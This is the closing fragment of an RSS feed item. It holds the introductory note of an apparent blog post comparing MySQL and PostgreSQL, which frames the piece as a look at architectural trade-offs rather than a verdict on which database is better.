&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Both MySQL and PostgreSQL are world-class databases powering some of the largest applications on the internet. This isn't about declaring a winner—it's about understanding the architectural trade-offs each database makes. Sometimes MySQL's choices are better for your use case, sometimes PostgreSQL's are. The goal is to give you the knowledge to make that decision yourself.&lt;/p&gt;

&lt;p&gt;Let's dive in.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
